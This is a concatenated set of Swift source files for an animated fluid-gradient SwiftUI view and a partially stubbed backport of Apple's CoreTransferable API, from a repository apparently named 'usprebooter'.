usprebooter/External/FluidGradient/FluidGradient.swift ================================================ // // FluidGradient.swift // FluidGradient // // Created by Oskar Groth on 2021-12-23. // import SwiftUI public struct FluidGradient: View { private var blobs: [Color] private var highlights: [Color] private var speed: CGFloat private var blur: CGFloat @State var blurValue: CGFloat = 0.0 public init(blobs: [Color], highlights: [Color] = [], speed: CGFloat = 1.0, blur: CGFloat = 0.75) { self.blobs = blobs self.highlights = highlights self.speed = speed self.blur = blur } public var body: some View { Representable(blobs: blobs, highlights: highlights, speed: speed, blurValue: $blurValue) .blur(radius: pow(blurValue, blur)) .accessibility(hidden: true) .clipped() } } #if os(OSX) typealias SystemRepresentable = NSViewRepresentable #else typealias SystemRepresentable = UIViewRepresentable #endif // MARK: - Representable extension FluidGradient { struct Representable: SystemRepresentable { var blobs: [Color] var highlights: [Color] var speed: CGFloat @Binding var blurValue: CGFloat func makeView(context: Context) -> FluidGradientView { context.coordinator.view } func updateView(_ view: FluidGradientView, context: Context) { context.coordinator.create(blobs: blobs, highlights: highlights) DispatchQueue.main.async { context.coordinator.update(speed: speed) } } #if os(OSX) func makeNSView(context: Context) -> FluidGradientView { makeView(context: context) } func updateNSView(_ view: FluidGradientView, context: Context) { updateView(view, context: context) } #else func makeUIView(context: Context) -> FluidGradientView { makeView(context: context) } func updateUIView(_ view: FluidGradientView, context: Context) { updateView(view, context: context) } #endif func makeCoordinator() -> Coordinator { Coordinator(blobs: blobs, highlights: highlights, speed: speed, blurValue: $blurValue) } } class Coordinator: FluidGradientDelegate { var blobs: [Color] var highlights: [Color] var speed: CGFloat var blurValue: Binding var view: FluidGradientView init(blobs: [Color], highlights: [Color], speed: CGFloat, blurValue: Binding) { self.blobs = blobs self.highlights = highlights self.speed = speed self.blurValue = blurValue self.view = FluidGradientView(blobs: blobs, highlights: highlights, speed: speed) self.view.delegate = self } /// Create blobs and highlights func create(blobs: [Color], highlights: [Color]) { guard blobs != self.blobs || highlights != self.highlights else { return } self.blobs = blobs self.highlights = highlights view.create(blobs, layer: view.baseLayer) view.create(highlights, layer: view.highlightLayer) view.update(speed: speed) } /// Update speed func update(speed: CGFloat) { guard speed != self.speed else { return } self.speed = speed view.update(speed: speed) } func updateBlur(_ value: CGFloat) { blurValue.wrappedValue = value } } } ================================================ FILE: usprebooter/External/FluidGradient/FluidGradientView.swift ================================================ // // FluidGradientView.swift // FluidGradientView // // Created by Oskar Groth on 2021-12-23. // import SwiftUI import Combine #if os(OSX) import AppKit public typealias SystemColor = NSColor public typealias SystemView = NSView #else import UIKit public typealias SystemColor = UIColor public typealias SystemView = UIView #endif /// A system view that presents an animated gradient with ``CoreAnimation`` public class FluidGradientView: SystemView { var speed: CGFloat let baseLayer = ResizableLayer() let highlightLayer = ResizableLayer() var cancellables = Set() weak var delegate: FluidGradientDelegate? init(blobs: [Color] = [], highlights: [Color] = [], speed: CGFloat = 1.0) { self.speed = speed super.init(frame: .zero) if let compositingFilter = CIFilter(name: "CIOverlayBlendMode") { highlightLayer.compositingFilter = compositingFilter } #if os(OSX) layer = ResizableLayer() wantsLayer = true postsFrameChangedNotifications = true layer?.delegate = self baseLayer.delegate = self highlightLayer.delegate = self self.layer?.addSublayer(baseLayer) self.layer?.addSublayer(highlightLayer) #else self.layer.addSublayer(baseLayer) self.layer.addSublayer(highlightLayer) #endif create(blobs, layer: baseLayer) create(highlights, layer: highlightLayer) DispatchQueue.main.async { self.update(speed: speed) } } required init?(coder: NSCoder) { fatalError("init(coder:) has not been implemented") } /// Create blobs and add to specified layer public func create(_ colors: [Color], layer: CALayer) { // Remove blobs at the end if colors are removed let count = layer.sublayers?.count ?? 0 let removeCount = count - colors.count if removeCount > 0 { layer.sublayers?.removeLast(removeCount) } for (index, color) in colors.enumerated() { if index < count { if let existing = layer.sublayers?[index] as? BlobLayer { existing.set(color: color) } } else { layer.addSublayer(BlobLayer(color: color)) } } } /// Update sublayers and set speed and blur levels public func update(speed: CGFloat) { cancellables.removeAll() self.speed = speed guard speed > 0 else { return } let layers = (baseLayer.sublayers ?? []) + (highlightLayer.sublayers ?? []) for layer in layers { if let layer = layer as? BlobLayer { Timer.publish(every: .random(in: 0.8/speed...1.2/speed), on: .main, in: .common) .autoconnect() .sink { _ in #if os(OSX) let visible = self.window?.occlusionState.contains(.visible) guard visible == true else { return } #endif layer.animate(speed: speed) } .store(in: &cancellables) } } } /// Compute and update new blur value private func updateBlur() { delegate?.updateBlur(min(frame.width, frame.height)) } /// Functional methods #if os(OSX) public override func viewDidMoveToWindow() { super.viewDidMoveToWindow() let scale = window?.backingScaleFactor ?? 2 layer?.contentsScale = scale baseLayer.contentsScale = scale highlightLayer.contentsScale = scale updateBlur() } public override func resize(withOldSuperviewSize oldSize: NSSize) { updateBlur() } #else public override func layoutSubviews() { layer.frame = self.bounds baseLayer.frame = self.bounds highlightLayer.frame = self.bounds updateBlur() } #endif } protocol FluidGradientDelegate: AnyObject { func updateBlur(_ value: CGFloat) } #if os(OSX) extension FluidGradientView: CALayerDelegate, NSViewLayerContentScaleDelegate { public func layer(_ layer: CALayer, shouldInheritContentsScale newScale: CGFloat, from window: NSWindow) -> Bool { return true } } #endif ================================================ FILE: usprebooter/External/FluidGradient/ResizableLayer.swift ================================================ // // ResizableLayer.swift // ResizableLayer // // Created by João Gabriel Pozzobon dos Santos on 03/10/22. // import SwiftUI /// An implementation of ``CALayer`` that resizes its sublayers public class ResizableLayer: CALayer { override init() { super.init() #if os(OSX) autoresizingMask = [.layerWidthSizable, .layerHeightSizable] #endif sublayers = [] } public override init(layer: Any) { super.init(layer: layer) } required init?(coder: NSCoder) { fatalError("init(coder:) has not been implemented") } public override func layoutSublayers() { super.layoutSublayers() sublayers?.forEach { layer in layer.frame = self.frame } } } ================================================ FILE: usprebooter/External/SwiftBackports/Backport.swift ================================================ import SwiftUI import ObjectiveC /// Provides a convenient method for backporting API, /// including types, functions, properties, property wrappers and more. /// /// To backport a SwiftUI Label for example, you could apply the /// following extension: /// /// extension Backport where Content == Any { /// public struct Label { } /// } /// /// Now if we want to provide further extensions to our backport type, /// we need to ensure we retain the `Content == Any` generic requirement: /// /// extension Backport.Label where Content == Any, Title == Text, Icon == Image { /// public init(_ title: S, systemName: String) { } /// } /// /// In addition to types, we can also provide backports for properties /// and methods: /// /// extension Backport.Label where Content: View { /// func onChange(of value: Value, perform action: (Value) -> Void) -> some View { /// // `content` provides access to the extended type /// content.modifier(OnChangeModifier(value, action)) /// } /// } /// public struct Backport { /// The underlying content this backport represents. public let wrapped: Wrapped /// Initializes a new Backport for the specified content. /// - Parameter content: The content (type) that's being backported public init(_ wrapped: Wrapped) { self.wrapped = wrapped } } public extension Backport where Wrapped == Any { init(_ wrapped: Wrapped) { self.wrapped = wrapped } } public extension NSObjectProtocol { /// Wraps an `NSObject` that can be extended to provide backport functionality. var backport: Backport { .init(self) } } ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Representations/Codable+Representation.swift ================================================ //import Foundation //import Combine // //@available(iOS, deprecated: 16) //@available(tvOS, deprecated: 16) //@available(macOS, deprecated: 13) //@available(watchOS, deprecated: 9) //public extension Backport { // /// A transfer representation for types that participate in Swift's protocols for encoding and decoding. // /// // /// struct Todo: Codable, BackportTransferable { // /// var text: String // /// var isDone = false // /// // /// static var transferRepresentation: some BackportTransferRepresentation { // /// Backport.CodableRepresentation(contentType: .todo) // /// } // /// } // /// // /// extension Backport.UTType { // /// static var todo: Backport.UTType { .init(exportedAs: "com.example.todo") } // /// } // /// // /// > Important: If your app declares custom uniform type identifiers, // /// include corresponding entries in the app's `Info.plist`. // /// // struct CodableRepresentation: BackportTransferRepresentation, Sendable where Item: BackportTransferable, Item: Decodable, Item: Encodable, Encoder: TopLevelEncoder, Decoder: TopLevelDecoder, Encoder.Output == Data, Decoder.Input == Data { // /// Creates a transfer representation for a given type and type identifier. // /// // /// This initializer uses JSON for encoding and decoding. // /// // /// - Parameters: // /// - itemType: The concrete type of the item that's being transferred. // /// - contentType: A uniform type identifier that best describes the item. // public init(for itemType: Item.Type = Item.self, contentType: Backport.UTType) where Encoder == JSONEncoder, Decoder == JSONDecoder { // // } // // /// Creates a transfer representation for a given type with the encoder and decoder you supply. // /// // /// - Parameters: // /// - itemType: The concrete type of the item that's being transported. // /// - contentType: A uniform type identifier that best describes the item. // /// - encoder: An instance of a type that can convert the item being transferred // /// into binary data with a specific structure. // /// - decoder: An instance of a type that can convert specifically structured // /// binary data into the item being transferred. // public init(for itemType: Item.Type = Item.self, contentType: Backport.UTType, encoder: Encoder, decoder: Decoder) { // // } // // /// The transfer representation for the item. // public typealias Body = Never // } //} ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Representations/Data+Representation.swift ================================================ //import Foundation // //public extension Backport { // /// A transfer representation for types that provide their own binary data conversion. // /// // /// Use this transfer representation if your model is stored in memory. // /// For example, a drawing app might have a notion of a *layer* // /// that can be converted to and from a custom binary data format and // /// also converted to the PNG image type: // /// // /// struct ImageDocumentLayer { // /// init(data: Data) throws // /// func data() -> Data // /// func pngData() -> Data // /// } // /// // /// You can provide multiple transfer representations for a model type, // /// even if the transfer representation types are the same. // /// The following shows the `ImageDocumentLayer` structure // /// conforming to `BackportTransferable` with two `Backport.DataRepresentation` instances // /// composed together: // /// // /// extension ImageDocumentLayer: BackportTransferable { // /// static var transferRepresentation: some BackportTransferRepresentation { // /// Backport.DataRepresentation(contentType: .layer) { layer in // /// layer.data() // /// } importing: { data in // /// try ImageDocumentLayer(data: data) // /// } // /// Backport.DataRepresentation(exportedContentType: .png) { layer in // /// layer.pngData() // /// } // /// } // /// } // /// // /// The example drawing app's custom transfer representation comes first // /// so that apps that know about the custom transfer representation can use it. // /// The second transfer representation offers export compatibility with other apps // /// that work with PNG images. // /// // /// > Tip: If a type conforms to `Codable`, `Backport.CodableRepresentation` might be // /// a more convenient choice than `Backport.DataRepresentation`. // struct DataRepresentation: BackportTransferRepresentation where Item: BackportTransferable { // let representation: DataTransferRepresentation // // /// Creates a representation that allows transporting an item as binary data. // /// // /// - Parameters: // /// - contentType: A uniform type identifier that best describes the item. // /// - exporting: A closure that provides a data representation of the given item. // /// - importing: A closure that instantiates the item with given binary data. // public init(contentType: Backport.UTType, exporting: @escaping @Sendable (Item) async throws -> Data, importing: @escaping @Sendable (Data) async throws -> Item) { // representation = .init(contentType: contentType, exporting: exporting, importing: importing) // } // // /// Creates a representation that allows exporting an item as binary data. // /// // /// - Parameters: // /// - exportedContentType: A uniform type identifier that best describes the item. // /// - exporting: A closure that provides a data representation of the given item. // public init(exportedContentType: Backport.UTType, exporting: @escaping @Sendable (Item) async throws -> Data) { // representation = .init(contentType: exportedContentType, exporting: exporting) // } // // /// Creates a representation that allows importing an item as binary data. // /// // /// - Parameters: // /// - importedContentType: A uniform type identifier that best describes the item. // /// - importing: A closure that instantiates the item with given binary data // public init(importedContentType: Backport.UTType, importing: @escaping @Sendable (Data) async throws -> Item) { // representation = .init(contentType: importedContentType, importing: importing) // } // // public var body: Never { fatalError() } // } // //} // //struct DataTransferRepresentation { // let contentType: Backport.UTType // let exporting: (@Sendable (Any) async throws -> Data)? // let importing: (@Sendable (Data) async throws -> Any)? // // init(contentType: Backport.UTType, exporting: @escaping (Item) async throws -> Data, importing: @escaping (Data) async throws -> Item) { // self.contentType = contentType // self.exporting = { item in try await exporting(item as! Item) } // self.importing = { data in try await importing(data) } // } // // init(contentType: Backport.UTType, exporting: @escaping (Item) async throws -> Data) { // self.contentType = contentType // self.exporting = { item in try await exporting(item as! Item) } // } // // init(contentType: Backport.UTType, importing: @escaping (Data) async throws -> Item) { // self.contentType = contentType // self.importing = { data in try await importing(data) } // } //} ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Representations/File+Representations.swift ================================================ //import Foundation // //@available(iOS, deprecated: 16) //@available(tvOS, deprecated: 16) //@available(macOS, deprecated: 13) //@available(watchOS, deprecated: 9) //public extension Backport { // /// A transfer representation for types that transfer as a file URL. // /// // /// Use a `Backport.FileRepresentation` for transferring types // /// that involve a large amount of data. // /// For example, if your app defines a `Movie` type that could represent a lengthy video, // /// use a `Backport.FileRepresentation` instance // /// to transfer the video data to another app or process. // /// // /// struct Movie: BackportTransferable { // /// let url: URL // /// static var transferRepresentation: some BackportTransferRepresentation { // /// Backport.FileRepresentation(contentType: .mpeg4Movie) { movie in // /// Backport.SentTransferredFile($0.url) // /// } importing: { received in // /// let copy: URL = URL(fileURLWithPath: "<#...#>") // /// try FileManager.default.copyItem(at: received.file, to: copy) // /// return Self.init(url: copy) } // /// } // /// } // /// It's efficient to pass such data around as a file and the receiver // /// loads it into memory only if it's required. // /// // struct FileRepresentation: BackportTransferRepresentation where Item: BackportTransferable { // /// Creates a transfer representation for importing and exporting // /// transferable items as files. // /// // /// - Parameters: // /// - contentType: A uniform type identifier that best describes the item. // /// - shouldAttemptToOpenInPlace: A Boolean value that // /// indicates whether the receiver gains access to the original item on disk // /// and can edit it, // /// or to a copy made by the system. // /// - exporting: A closure that provides a file representation of the given item. // /// - importing: A closure that instantiates the item with given file promise. // /// The file referred to by the // /// `Backport.ReceivedTransferredFile.file` property of the // /// `Backport.ReceivedTransferredFile` instance // /// is only guaranteed to exist within the `importing` closure. If you need the file // /// to be around for a longer period, make a copy in the `importing` closure. // public init(contentType: Backport.UTType, shouldAttemptToOpenInPlace: Bool = false, exporting: @escaping @Sendable (Item) async throws -> Backport.SentTransferredFile, importing: @escaping @Sendable (Backport.ReceivedTransferredFile) async throws -> Item) { // // } // // /// Creates a transfer representation for exporting transferable items as files. // /// // /// - Parameters: // /// - exportedContentType: A uniform type identifier for the file `URL`, // /// returned by the `exporting` closure. // /// - shouldAllowToOpenInPlace: A Boolean value that indicates whether // /// the receiver can try to gain access to the original item on disk // /// and can edit it. // /// If `false`, the receiver only has access to a copy of the file // /// made by the system. // /// - exporting: A closure that provides a file representation of the given item. // public init(exportedContentType: Backport.UTType, shouldAllowToOpenInPlace: Bool = false, exporting: @escaping @Sendable (Item) async throws -> Backport.SentTransferredFile) { // // } // // /// Creates a transfer representation for importing transferable items as files. // /// // /// - Parameters: // /// - importedContentType: A uniform type identifier for the file promise, // /// returned by the `exporting` closure. // /// - shouldAttemptToOpenInPlace: A Boolean value that indicates whether // /// the receiver wants to gain access to the original item on disk // /// and can edit it. // /// If `false`, the receiver only has access to a copy of the file // /// made by the system. // /// - importing: A closure that creates the item with given file promise. // /// The file referred to by the `file` property of the `ReceivedTransferredFile` // /// is only guaranteed to exist within the `importing` closure. If you need the file // /// to be around for a longer period, make a copy in the `importing` closure. // public init(importedContentType: Backport.UTType, shouldAttemptToOpenInPlace: Bool = false, importing: @escaping @Sendable (Backport.ReceivedTransferredFile) async throws -> Item) { // // } // // /// The transfer representation for the item. // public typealias Body = Never // } //} ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Representations/Never+Representation.swift ================================================ import Foundation extension Never: BackportTransferRepresentation { /// The type of the item that's being transferred. public typealias Item = Never /// A builder expression that describes the process of importing and exporting an item. /// /// Combine multiple existing transfer representations /// to compose a single transfer representation that describes /// how to transfer an item in multiple scenarios. /// /// struct CombinedRepresentation: BackportTransferRepresentation { /// var body: some BackportTransferRepresentation { /// Backport.DataRepresentation(...) /// Backport.FileRepresentation(...) /// } /// } /// public var body: Never { fatalError() } } ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Representations/Tuple+Representation.swift ================================================ //import Foundation // //@available(iOS, deprecated: 16) //@available(tvOS, deprecated: 16) //@available(macOS, deprecated: 13) //@available(watchOS, deprecated: 9) //public extension Backport { // /// A wrapper type for tuples that contain transfer representations. // struct TupleTransferRepresentation: BackportTransferRepresentation where Item: BackportTransferable, Value: Sendable { // /// A builder expression that describes the process of importing and exporting an item. // /// // /// Combine multiple existing transfer representations // /// to compose a single transfer representation that describes // /// how to transfer an item in multiple scenarios. // /// // /// struct CombinedRepresentation: BackportTransferRepresentation { // /// var body: some BackportTransferRepresentation { // /// Backport.DataRepresentation(...) // /// Backport.FileRepresentation(...) // /// } // /// } // /// // public var body: some BackportTransferRepresentation { // fatalError() // } // } //} ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Representations/_ConditionalRepresentation.swift ================================================ //import Foundation // //public extension Backport { // struct _ConditionalTransferRepresentation: BackportTransferRepresentation { // let condition: @Sendable (Item) -> Bool // public var body: some BackportTransferRepresentation { // fatalError() // } // } //} ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Support/NSItemProvider+Transferable.swift ================================================ //import Foundation // //extension NSItemProvider { // /// Registers every transfer representation of given item with the receiver. // /// - Parameter transferable: The item to register. // public func register(_ transferable: @autoclosure @escaping @Sendable () -> T) where T: BackportTransferable { // fatalError() // } // // public func loadTransferable(type transferableType: T.Type, completionHandler: @escaping @Sendable (Result) -> Void) -> Progress where T: BackportTransferable { // .init() // } //} ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Support/ReceivedTransferredFile.swift ================================================ import Foundation @available(iOS, deprecated: 16) @available(tvOS, deprecated: 16) @available(macOS, deprecated: 13) @available(watchOS, deprecated: 9) public extension Backport { struct ReceivedTransferredFile : Sendable { /// The received file on disk. public let file: URL /// A Boolean value that indicates whether the file's URL /// points to the original file provided by the sender /// or to a copy. public let isOriginalFile: Bool } } ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Support/SentTransferredFile.swift ================================================ import Foundation @available(iOS, deprecated: 16) @available(tvOS, deprecated: 16) @available(macOS, deprecated: 13) @available(watchOS, deprecated: 9) public extension Backport { struct SentTransferredFile: Sendable { /// A URL that describes the location of the file. public let file: URL /// A Boolean value that indicates whether /// the receiver can read and write the original file. /// When set to `false`, the receiver can only gain access to a copy of the file. public let allowAccessingOriginalFile: Bool /// Creates a description of a file from the perspective of the sender. /// /// - Parameters: /// - file: A URL that describes the location of the file. /// - allowAccessingOriginalFile: A Boolean value that indicates whether /// the receiver can read and write the original file. /// When set to `false`, the receiver can only gain access to a copy of the file. public init(_ file: URL, allowAccessingOriginalFile: Bool = false) { self.file = file self.allowAccessingOriginalFile = allowAccessingOriginalFile } } } ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Support/Visibility.swift ================================================ import Foundation @available(iOS, deprecated: 16) @available(tvOS, deprecated: 16) @available(macOS, deprecated: 13) @available(watchOS, deprecated: 9) extension Backport { /// The visibility levels that specify the kinds of apps and processes /// that can see an item in transit. public struct TransferRepresentationVisibility: Sendable, Equatable { enum Visibility { @available(iOS, unavailable) @available(tvOS, unavailable) @available(watchOS, unavailable) case group case ownProcess case all } let visibility: Visibility /// The visibility level that specifies that any app or process can access the item. public static let all: Self = .init(visibility: .all) /// The visibility level that specifies that the item is visible only /// to macOS apps in the same App Group. @available(iOS, unavailable) @available(tvOS, unavailable) @available(watchOS, unavailable) public static let group: Self = .init(visibility: .group) /// The visibility level that specifies that the item is visible only /// within the app that's the source of the item. public static let ownProcess: Self = .init(visibility: .ownProcess) } } ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/TransferRepresentationBuilder.swift ================================================ import Foundation import Combine @available(iOS, deprecated: 16) @available(tvOS, deprecated: 16) @available(macOS, deprecated: 13) @available(watchOS, deprecated: 9) public extension Backport { /// Creates a transfer representation by composing existing transfer representations. @resultBuilder struct TransferRepresentationBuilder where Item: BackportTransferable { // /// Builds an encodable and decodable transfer representation from an expression. // public static func buildExpression(_ content: Backport.CodableRepresentation) -> Backport.CodableRepresentation where Item: Decodable, Item: Encodable, Encoder: TopLevelEncoder, Decoder: TopLevelDecoder, Encoder.Output == Data, Decoder.Input == Data { // Backport.CodableRepresentation(for: Item.self, contentType: Item) // } // // /// Builds a transfer representation from an expression. // public static func buildExpression(_ content: R) -> R where Item == R.Item, R: BackportTransferRepresentation { // fatalError() // } /// Passes a single transfer representation to the builder unmodified. public static func buildBlock(_ content: Content) -> Content where Item == Content.Item, Content: BackportTransferRepresentation { fatalError() } // /// Combines multiple transfer representations into a single transfer representation. // public static func buildBlock(_ content1: C1, _ content2: C2) -> Backport.TupleTransferRepresentation where Item == C1.Item, C1: BackportTransferRepresentation, C2: BackportTransferRepresentation, C1.Item == C2.Item { // fatalError() // } // // /// Combines multiple transfer representations into a single transfer representation. // public static func buildBlock(_ content1: C1, _ content2: C2, _ content3: C3) -> Backport.TupleTransferRepresentation where Item == C1.Item, C1: BackportTransferRepresentation, C2: BackportTransferRepresentation, C3: BackportTransferRepresentation, C1.Item == C2.Item, C2.Item == C3.Item { // fatalError() // } // // /// Combines multiple transfer representations into a single transfer representation. // public static func buildBlock(_ content1: C1, _ content2: C2, _ content3: C3, _ content4: C4) -> Backport.TupleTransferRepresentation where Item == C1.Item, C1: BackportTransferRepresentation, C2: BackportTransferRepresentation, C3: BackportTransferRepresentation, C4: BackportTransferRepresentation, C1.Item == C2.Item, C2.Item == C3.Item, C3.Item == C4.Item { // fatalError() // } // // /// Combines multiple transfer representations into a single transfer representation. // public static func buildBlock(_ content1: C1, _ content2: C2, _ content3: C3, _ content4: C4, _ content5: C5) -> Backport.TupleTransferRepresentation where Item == C1.Item, C1: BackportTransferRepresentation, C2: BackportTransferRepresentation, C3: BackportTransferRepresentation, C4: BackportTransferRepresentation, C5: BackportTransferRepresentation, C1.Item == C2.Item, C2.Item == C3.Item, C3.Item == C4.Item, C4.Item == C5.Item { // fatalError() // } // // /// Combines multiple transfer representations into a single transfer representation. // public static func buildBlock(_ content1: C1, _ content2: C2, _ content3: C3, _ content4: C4, _ content5: C5, _ content6: C6) -> Backport.TupleTransferRepresentation where Item == C1.Item, C1: BackportTransferRepresentation, C2: BackportTransferRepresentation, C3: BackportTransferRepresentation, C4: BackportTransferRepresentation, C5: BackportTransferRepresentation, C6: BackportTransferRepresentation, C1.Item == C2.Item, C2.Item == C3.Item, C3.Item == C4.Item, C4.Item == C5.Item, C5.Item == C6.Item { // fatalError() // } // // /// Combines multiple transfer representations into a single transfer representation. // public static func buildBlock(_ content1: C1, _ content2: C2, _ content3: C3, _ content4: C4, _ content5: C5, _ content6: C6, _ content7: C7) -> Backport.TupleTransferRepresentation where Item == C1.Item, C1: BackportTransferRepresentation, C2: BackportTransferRepresentation, C3: BackportTransferRepresentation, C4: BackportTransferRepresentation, C5: BackportTransferRepresentation, C6: BackportTransferRepresentation, C7: BackportTransferRepresentation, C1.Item == C2.Item, C2.Item == C3.Item, C3.Item == C4.Item, C4.Item == C5.Item, C5.Item == C6.Item, C6.Item == C7.Item { // fatalError() // } // // /// Combines multiple transfer representations into a single transfer representation. // public static func buildBlock(_ content1: C1, _ content2: C2, _ content3: C3, _ content4: C4, _ content5: C5, _ content6: C6, _ content7: C7, _ content8: C8) -> Backport.TupleTransferRepresentation where Item == C1.Item, C1: BackportTransferRepresentation, C2: BackportTransferRepresentation, C3: BackportTransferRepresentation, C4: BackportTransferRepresentation, C5: BackportTransferRepresentation, C6: BackportTransferRepresentation, C7: BackportTransferRepresentation, C8: BackportTransferRepresentation, C1.Item == C2.Item, C2.Item == C3.Item, C3.Item == C4.Item, C4.Item == C5.Item, C5.Item == C6.Item, C6.Item == C7.Item, C7.Item == C8.Item { // fatalError() // } // // /// Combines multiple transfer representations into a single transfer representation. // public static func buildBlock(_ content1: C1, _ content2: C2, _ content3: C3, _ content4: C4, _ content5: C5, _ content6: C6, _ content7: C7, _ content8: C8, _ content9: C9) -> Backport.TupleTransferRepresentation where Item == C1.Item, C1: BackportTransferRepresentation, C2: BackportTransferRepresentation, C3: BackportTransferRepresentation, C4: BackportTransferRepresentation, C5: BackportTransferRepresentation, C6: BackportTransferRepresentation, C7: BackportTransferRepresentation, C8: BackportTransferRepresentation, C9: BackportTransferRepresentation, C1.Item == C2.Item, C2.Item == C3.Item, C3.Item == C4.Item, C4.Item == C5.Item, C5.Item == C6.Item, C6.Item == C7.Item, C7.Item == C8.Item, C8.Item == C9.Item { // fatalError() // } // // /// Combines multiple transfer representations into a single transfer representation. // public static func buildBlock(_ content1: C1, _ content2: C2, _ content3: C3, _ content4: C4, _ content5: C5, _ content6: C6, _ content7: C7, _ content8: C8, _ content9: C9, _ content10: C10) -> Backport.TupleTransferRepresentation where Item == C1.Item, C1: BackportTransferRepresentation, C2: BackportTransferRepresentation, C3: BackportTransferRepresentation, C4: BackportTransferRepresentation, C5: BackportTransferRepresentation, C6: BackportTransferRepresentation, C7: BackportTransferRepresentation, C8: BackportTransferRepresentation, C9: BackportTransferRepresentation, C10: BackportTransferRepresentation, C1.Item == C2.Item, C2.Item == C3.Item, C3.Item == C4.Item, C4.Item == C5.Item, C5.Item == C6.Item, C6.Item == C7.Item, C7.Item == C8.Item, C8.Item == C9.Item, C9.Item == C10.Item { // fatalError() // } } } ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Transferable.swift ================================================ import Foundation /// A protocol that describes how a type interacts with transport APIs /// such as drag and drop or copy and paste. /// /// To conform to the `BackportTransferable` protocol, /// implement the ``transferRepresentation`` property. /// For example, an image editing app's layer type might /// conform to `BackportTransferable` to let people drag and drop image layers /// to reorder them within a document. /// /// struct ImageDocumentLayer { /// init(data: Data) /// func data() -> Data /// func pngData() -> Data /// } /// /// The following shows how you can extend `ImageDocumentLayer` to /// conform to `BackportTransferable`: /// /// extension ImageDocumentLayer: BackportTransferable { /// static var transferRepresentation: some BackportTransferRepresentation { /// Backport.DataRepresentation(contentType: .layer) { layer in /// layer.data() /// }, importing: { data in /// try Layer(data: data) /// } /// Backport.DataRepresentation(exportedContentType: .png) { layer in /// layer.pngData() /// } /// } /// /// When people drag and drop a layer within the app or onto another app /// that recognizes the custom `layer` content type, /// the app uses the first representation. /// When people drag and drop the layer onto a different image editor, /// it's likely that the editor recognizes the PNG file type. /// The second transfer representation adds support for PNG files. /// /// The following declares the custom `layer` uniform type identifier: /// /// extension Backport.UTType { /// static var layer: Backport.UTType { Backport.UTType(exportedAs: "com.example.layer") } /// } /// /// > Important: If your app declares custom uniform type identifiers, /// include corresponding entries in the app's `Info.plist`. /// /// If one of your existing types conforms to `Codable`, /// `BackportTransferable` automatically handles conversion to and from `Data`. /// The following declares a simple `Note` structure that's `Codable` /// and an extension to make it `BackportTransferable`: /// /// struct Note: Codable { /// let title: String /// let body: String /// } /// /// extension Note: BackportTransferable { /// static var transferRepresentation: some BackportTransferRepresentation { /// Backport.CodableRepresentation(contentType: .note) /// } /// } /// /// To ensure compatibility with other apps that don't know about /// the custom `note` type identifier, /// the following adds an additional transfer representation /// that converts the note to text. /// /// extension Note: BackportTransferable { /// static var transferRepresentation: some BackportTransferRepresentation { /// Backport.CodableRepresentation(contentType: .note) /// Backport.ProxyRepresentation(\.title) /// } /// } /// The order of the representations in the transfer representation matters; /// place the representation that most accurately represents your type first, /// followed by a sequence of more compatible /// but less preferable representations. /// @available(iOS, deprecated: 16) @available(tvOS, deprecated: 16) @available(macOS, deprecated: 13) @available(watchOS, deprecated: 9) public protocol BackportTransferable { /// The type of the representation used to import and export the item. /// /// Swift infers this type from the return value of the /// ``transferRepresentation`` property. associatedtype Representation: BackportTransferRepresentation /// The representation used to import and export the item. /// /// A ``transferRepresentation`` can contain multiple representations /// for different content types. @Backport.TransferRepresentationBuilder static var transferRepresentation: Representation { get } } ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/TransferableRepresentation.swift ================================================ import Foundation /// A declarative description of the process of importing and exporting a transferable item. /// /// Combine multiple existing transfer representations /// to compose a single transfer representation that describes /// how to transfer an item in multiple scenarios. /// /// The following shows a `Greeting` type that transfers both as a `Codable` type /// and by proxy through its `message` string. /// /// import UniformTypeIdentifiers /// /// struct Greeting: Codable, BackportTransferable { /// let message: String /// var displayInAllCaps: Bool = false /// /// static var transferRepresentation: some BackportTransferRepresentation { /// Backport.CodableRepresentation(contentType: .greeting) /// Backport.ProxyRepresentation(exporting: \.message) /// } /// } /// /// extension Backport.UTType { /// static var greeting: Backport.UTType { .init(exportedAs: "com.example.greeting") } /// } /// @available(iOS, deprecated: 16) @available(tvOS, deprecated: 16) @available(macOS, deprecated: 13) @available(watchOS, deprecated: 9) public protocol BackportTransferRepresentation: Sendable { /// The type of the item that's being transferred. associatedtype Item: BackportTransferable /// The transfer representation for the item. associatedtype Body: BackportTransferRepresentation /// A builder expression that describes the process of importing and exporting an item. /// /// Combine multiple existing transfer representations /// to compose a single transfer representation that describes /// how to transfer an item in multiple scenarios. /// /// struct CombinedRepresentation: BackportTransferRepresentation { /// var body: some BackportTransferRepresentation { /// Backport.DataRepresentation(...) /// Backport.FileRepresentation(...) /// } /// } /// @Backport.TransferRepresentationBuilder var body: Body { get } } //extension BackportTransferRepresentation { // /// Specifies the kinds of apps and processes that can see an item in transit. // /// // /// - Parameters: // /// - visibility: The visibility level. // public func visibility(_ visibility: Backport.TransferRepresentationVisibility) -> some BackportTransferRepresentation { // fatalError() // } //} // //extension BackportTransferRepresentation { // // /// Prevents the system from exporting an item if it does not meet the supplied condition. // /// // /// Some instances of a model type may have state-dependent conditions that make them // /// unsuitable for export. For example, an `Archive` structure that supports // /// a comma-separated text representation only when it has compatible content: // /// // /// struct Archive { // /// var supportsCSV: Bool // /// func csvData() -> Data // /// init(csvData: Data) // /// } // /// // /// extension Archive: BackportTransferable { // /// static var transferRepresentation: some BackportTransferRepresentation { // /// Backport.DataRepresentation(contentType: .commaSeparatedText) { archive in // /// archive.csvData() // /// } importing: { data in Archive(csvData: data) } // /// .exportingCondition { archive in archive.supportsCSV } // /// } // /// } // /// // /// - Parameters: // /// - condition: A closure that determines whether the item is exportable. // public func exportingCondition(_ condition: @escaping @Sendable (Item) -> Bool) -> Backport._ConditionalTransferRepresentation { // Backport._ConditionalTransferRepresentation(condition: condition) // } //} // 